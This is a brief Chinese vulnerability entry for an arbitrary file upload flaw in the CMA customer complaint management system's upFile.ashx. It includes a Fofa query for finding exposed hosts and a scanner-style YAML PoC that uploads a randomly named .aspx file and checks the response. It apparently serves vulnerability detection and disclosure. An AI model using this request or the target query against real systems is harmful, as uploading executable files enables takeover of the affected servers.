漏洞描述
CMA 客诉管理系统 upFile.ashx文件存在任意文件上传漏洞,通过漏洞攻击者可以上传任意文件控制服务器
Fofa: title="CMA客诉管理系统手机端"
cmakesu-upfile-ashx-anyfile-upload: CMA 客诉管理系统 upFile.ashx 任意文件上传漏洞
PoC代码[已公开]
id: cmakesu-upfile-ashx-anyfile-upload
info:
name: CMA 客诉管理系统 upFile.ashx 任意文件上传漏洞
author: daffainfo
severity: critical
verified: false
description: |
CMA 客诉管理系统 upFile.ashx文件存在任意文件上传漏洞,通过漏洞攻击者可以上传任意文件控制服务器
Fofa: title="CMA客诉管理系统手机端"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/CMA%E5%AE%A2%E8%AF%89%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20upFile.ashx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
set:
r1: randomLowercase(20)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /upFile/upFile.ashx
headers:
Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
body: "\
--WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"{{r1}}.aspx\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
{{r1}}\r\n\
\r\n\
--WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: |
response.status == 200 &&
response.body.bcontains(b'"path":') &&
response.body.bcontains(bytes(r1 + '.aspx'))
expression: r0()